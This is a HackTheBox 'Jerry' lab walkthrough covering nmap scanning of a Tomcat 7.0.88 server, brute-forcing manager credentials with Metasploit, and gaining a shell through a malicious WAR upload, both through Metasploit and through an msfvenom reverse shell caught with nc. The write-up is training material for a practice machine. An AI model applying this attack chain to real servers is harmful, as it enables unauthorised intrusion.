Jerry Walkthrough

Hello Everyone! Today we have another machine from HackTheBox “Jerry”, we will deal with this machine by using metasploit and by using manual exploitation, let’s see the machine’s info

Okay, let’s get started…

DNS Enumeration

At the first we will scan the IP of the machine 10.10.10.95 by nmap to know the open ports, service running, OS info and other info so the command will be

nmap -A -T4 -oG jerry.gnmap 10.10.10.95 and the results as you see here

You should note something wired, tomcat at normal doesn’t return the version but here it does so it’s something we may take it as entry point.

The second thing you should note is the port 8080 is open so let’s try to open it on the browser 10.10.10.95:8080

You will find the version of the server as we found before by nmap so note these informations

I’ve used exploit-db,rapid7 and searchsploit to search for CVE’s related to these keywords (tomcat / coyote / tomcat 7.0.88) and the results are recommending the same CVE

This CVE is to manage the manager or the admin to upload shell instead of war files so from these informations we need to be the manager or the admin (have an admin account) and then use Metasploite or Manual exploitation to open reverse shell. Let’s try first to get admin account

Website Enumeration

In this step we need to brute-force the directories trying to find any leaked data containing account credentials, so we will use fuff or dirbuster or dirsearch or gobuster or metasploit modules

I’ll use metasploit for this step

I’ve used scanner/http/dir_scanner to discover the hidden directories and as you can see there’s nothing useful because the/manager directory for example need authenticated users.

Let’s search for tomcat to see if we can find another exploitation search tomcat

As you can see all these exploitation asks you to be authenticated user, so we will use the /tomcat/mgr/login auxiliary module to brute-force the user and password and edit the default options as follows

the results…

We have a successful login here with username:tomcat & password:s3cret

I’ve tried to login to the 10.10.10.95:8080/manager with the upper credentials and it’s worked

1. Using Metasploit exploitations

we will use exploitation module multi/http/tomcat_mgr_upload and edit the options with the username and the password as follows here

then type run

That’s great, we have shell now. Let’s see our role

Good we’re admin, let’s search for the flags

Here we will find the 2 flags in one place in the Administrator directory

Congrats ❤ let’s try the second method

2. Manual Exploitation — Without Metasploit

we can upload a war file as we can see here in the manager page select WAR file to upload

So we will generate a shell by using msfvenom as follows

And here’s all the payloads which related to JAVA

Good now we have a reverse shell shell.war. Let’s try to upload it and then access it from the link 10.10.10.95:8080/shell.war and at the same time open nc to listen for the port 443 as follows and as you can see it’s worked :)

Here we finished ❤

Congrats ❤

Stay in touch :)

LinkedIn | GitHub | Twitter